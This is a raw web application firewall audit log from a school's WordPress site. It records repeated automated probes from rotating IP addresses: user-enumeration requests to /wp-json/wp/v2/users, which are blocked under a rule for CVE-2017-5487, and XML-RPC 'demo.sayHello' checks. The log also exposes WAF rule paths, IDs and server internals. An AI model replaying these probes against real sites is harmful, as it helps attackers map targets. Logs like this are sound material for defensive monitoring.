Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ff8485f-Z-- --a28d1f66-A-- [05/May/2025:22:27:02 +0700] aBjYxoZWvR7-42f6JrAF5AAAANA 103.236.140.4 50608 103.236.140.4 8181 --a28d1f66-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.42 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a28d1f66-C-- demo.sayHello --a28d1f66-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a28d1f66-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458822925626 5897 (- - -) Stopwatch2: 1746458822925626 5897; combined=4801, p1=606, p2=3958, p3=39, p4=44, p5=92, sr=77, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a28d1f66-Z-- --94ce4242-A-- [05/May/2025:22:28:37 +0700] aBjZJfZJDMuQndL03JNVCAAAAFQ 103.236.140.4 51384 103.236.140.4 8181 --94ce4242-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --94ce4242-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --94ce4242-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458917164614 2740 (- - -) Stopwatch2: 1746458917164614 2740; combined=1268, p1=410, p2=829, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94ce4242-Z-- --298eff48-A-- [05/May/2025:22:28:39 +0700] aBjZJ4ZWvR7-42f6JrAGRwAAAMA 103.236.140.4 51404 103.236.140.4 8181 --298eff48-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.12 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --298eff48-C-- demo.sayHello --298eff48-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --298eff48-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458919940769 5173 (- - -) Stopwatch2: 1746458919940769 5173; combined=4182, p1=522, p2=3430, p3=32, p4=35, p5=96, sr=76, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --298eff48-Z-- --cf234c64-A-- [05/May/2025:22:30:53 +0700] aBjZrfZJDMuQndL03JNVQQAAAFU 103.236.140.4 52490 103.236.140.4 8181 --cf234c64-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cf234c64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf234c64-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459053615725 2674 (- - -) Stopwatch2: 1746459053615725 2674; combined=1211, p1=411, p2=771, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf234c64-Z-- --9c727422-A-- [05/May/2025:22:30:56 +0700] aBjZsPZJDMuQndL03JNVQgAAAE4 103.236.140.4 52522 103.236.140.4 8181 --9c727422-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.186 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9c727422-C-- demo.sayHello --9c727422-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c727422-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459056390557 5933 (- - -) Stopwatch2: 1746459056390557 5933; combined=4387, p1=540, p2=3609, p3=31, p4=35, p5=101, sr=72, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c727422-Z-- --44346122-A-- [05/May/2025:22:31:10 +0700] aBjZvoZWvR7-42f6JrAGiAAAAMg 103.236.140.4 52638 103.236.140.4 8181 --44346122-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --44346122-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44346122-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459070747717 2764 (- - -) Stopwatch2: 1746459070747717 2764; combined=1251, p1=403, p2=819, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44346122-Z-- --85f5dc15-A-- [05/May/2025:22:31:14 +0700] aBjZwoZWvR7-42f6JrAGkAAAAMk 103.236.140.4 52678 103.236.140.4 8181 --85f5dc15-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.248 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --85f5dc15-C-- demo.sayHello --85f5dc15-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --85f5dc15-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459074034542 5408 (- - -) Stopwatch2: 1746459074034542 5408; combined=4223, p1=494, p2=3502, p3=32, p4=35, p5=94, sr=72, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85f5dc15-Z-- --b3961a12-A-- [05/May/2025:22:32:01 +0700] aBjZ8YZWvR7-42f6JrAGqgAAAMo 103.236.140.4 53062 103.236.140.4 8181 --b3961a12-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.182 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b3961a12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3961a12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459121415828 2972 (- - -) Stopwatch2: 1746459121415828 2972; combined=1237, p1=420, p2=788, p3=0, p4=0, p5=29, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3961a12-Z-- --b4f30337-A-- [05/May/2025:22:32:04 +0700] aBjZ9IZWvR7-42f6JrAGswAAAMs 103.236.140.4 53094 103.236.140.4 8181 --b4f30337-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.182 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b4f30337-C-- demo.sayHello --b4f30337-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4f30337-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459124207941 6190 (- - -) Stopwatch2: 1746459124207941 6190; combined=4821, p1=633, p2=3939, p3=40, p4=43, p5=99, sr=81, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4f30337-Z-- --e2077151-A-- [05/May/2025:22:33:07 +0700] aBjaMwRwKNFSM6B7_LabFAAAAIA 103.236.140.4 53626 103.236.140.4 8181 --e2077151-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e2077151-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2077151-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459187124313 2554 (- - -) Stopwatch2: 1746459187124313 2554; combined=1408, p1=449, p2=916, p3=0, p4=0, p5=43, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2077151-Z-- --a7424e73-A-- [05/May/2025:22:33:09 +0700] aBjaNU2V_h1VFAgsfgZ3AQAAAAE 103.236.140.4 53646 103.236.140.4 8181 --a7424e73-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.142 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a7424e73-C-- demo.sayHello --a7424e73-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7424e73-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459189854055 5112 (- - -) Stopwatch2: 1746459189854055 5112; combined=4083, p1=525, p2=3340, p3=31, p4=36, p5=89, sr=73, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7424e73-Z-- --b0fcd016-A-- [05/May/2025:22:33:55 +0700] aBjaYwRwKNFSM6B7_LabOAAAAIM 103.236.140.4 54066 103.236.140.4 8181 --b0fcd016-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.139 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.139 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b0fcd016-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b0fcd016-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459235476508 2839 (- - -) Stopwatch2: 1746459235476508 2839; combined=1347, p1=435, p2=883, p3=0, p4=0, p5=29, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b0fcd016-Z-- --f6299a47-A-- [05/May/2025:22:33:58 +0700] aBjaZoZWvR7-42f6JrAG8AAAANU 103.236.140.4 54098 103.236.140.4 8181 --f6299a47-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.139 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.139 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f6299a47-C-- demo.sayHello --f6299a47-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6299a47-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459238728933 6647 (- - -) Stopwatch2: 1746459238728933 6647; combined=4805, p1=664, p2=3855, p3=38, p4=42, p5=118, sr=129, sw=88, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6299a47-Z-- --9bd6b515-A-- [05/May/2025:22:34:16 +0700] aBjaeARwKNFSM6B7_LabRwAAAIA 103.236.140.4 54238 103.236.140.4 8181 --9bd6b515-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.163 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9bd6b515-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bd6b515-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459256599149 2239 (- - -) Stopwatch2: 1746459256599149 2239; combined=1228, p1=407, p2=791, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bd6b515-Z-- --4fd21667-A-- [05/May/2025:22:34:17 +0700] aBjaeYZWvR7-42f6JrAG-AAAAMY 103.236.140.4 54252 103.236.140.4 8181 --4fd21667-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.77.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.77.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4fd21667-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4fd21667-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459257848700 2912 (- - -) Stopwatch2: 1746459257848700 2912; combined=1241, p1=402, p2=810, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4fd21667-Z-- --d7e87b7d-A-- [05/May/2025:22:34:19 +0700] aBjaewRwKNFSM6B7_LabSAAAAJU 103.236.140.4 54266 103.236.140.4 8181 --d7e87b7d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.163 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d7e87b7d-C-- demo.sayHello --d7e87b7d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7e87b7d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459259388949 5200 (- - -) Stopwatch2: 1746459259388949 5200; combined=3902, p1=505, p2=3182, p3=29, p4=30, p5=92, sr=84, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7e87b7d-Z-- --38ce9724-A-- [05/May/2025:22:34:20 +0700] aBjafARwKNFSM6B7_LabSgAAAIo 103.236.140.4 54272 103.236.140.4 8181 --38ce9724-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.77.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.77.215 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --38ce9724-C-- demo.sayHello --38ce9724-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --38ce9724-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s 